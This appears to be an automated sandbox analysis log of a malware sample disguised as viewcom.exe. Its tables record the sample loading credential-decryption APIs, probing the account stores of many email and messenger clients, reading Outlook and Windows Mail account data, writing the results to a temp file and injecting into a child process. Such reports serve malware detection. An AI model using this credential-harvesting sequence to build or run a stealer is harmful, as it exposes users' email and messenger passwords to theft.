|---|---|---|---|---|---|
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x723c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x723c6be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x7673fb26 |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom_lng.ini, type = file_attributes |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Profiles, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Thunderbird\Profiles, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Thunderbird, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x72810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\pstorec.dll, function = PStoreCreateInstance, address_out = 0x7281526c |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x757e5a7f |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x760771c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x7603b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x76077941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76077381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x76077481 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9} |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}, value_name = Username, data = Main Identity, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\Software\Microsoft\Internet Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\21c3340121c69b4d9839e87233c43775 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\21c3340121c69b4d9839e87233c43775 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5820efc9fdbb5f47849ddf6d61a8efbf |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5820efc9fdbb5f47849ddf6d61a8efbf |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5822179f3ba9dd4b834ca5b688df58ee |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5822179f3ba9dd4b834ca5b688df58ee |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5cf6dc56389a514da4af66e8d249d682 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5cf6dc56389a514da4af66e8d249d682 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\79245ba6aebb494e8474990b23b0b5d9 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\79245ba6aebb494e8474990b23b0b5d9 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\822186790bcca847a772607001697335 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\822186790bcca847a772607001697335 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 208, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 208, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 208, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 208, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, data = dkjvzh@jjjd.com, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, data = ffadv, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Display Name, data = djvohe, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, data = dkjvzh@jjjd.com, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, data = ddvs, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Use SPA, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 100, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b76d3b10d1949342bbbb36b682c4ceca |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b76d3b10d1949342bbbb36b682c4ceca |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x760771c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x7603b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x76077941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76077381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x76077481 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x757e5a7f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x760771c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x7603b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x76077941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76077381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x76077481 |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount, size = 1506, size_out = 1506 |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount, size = 1734, size_out = 1734 |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount, size = 670, size_out = 670 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail |
|
1 | |
| File | Create | filename = C:\ProgramData\9F1B.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 6 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 12 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 15 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 5 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 2 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 4 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 15 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 7 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 4 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\9F1B.tmp, size = 2 |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
| Command Line | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:01:18, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:16 |
| Information | Value |
|---|---|
| PID | 0xc78 |
| Parent PID | 0xb98 (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C7C
0x
C98
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xc58 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xc58 | address = 0x7ffd8008, size = 4 |
|
1 | |
| Modify Control Flow | #6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 0xc58 | os_tid = 0xc7c, address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x723c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x723c6be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x76510468 |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom_lng.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
18 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
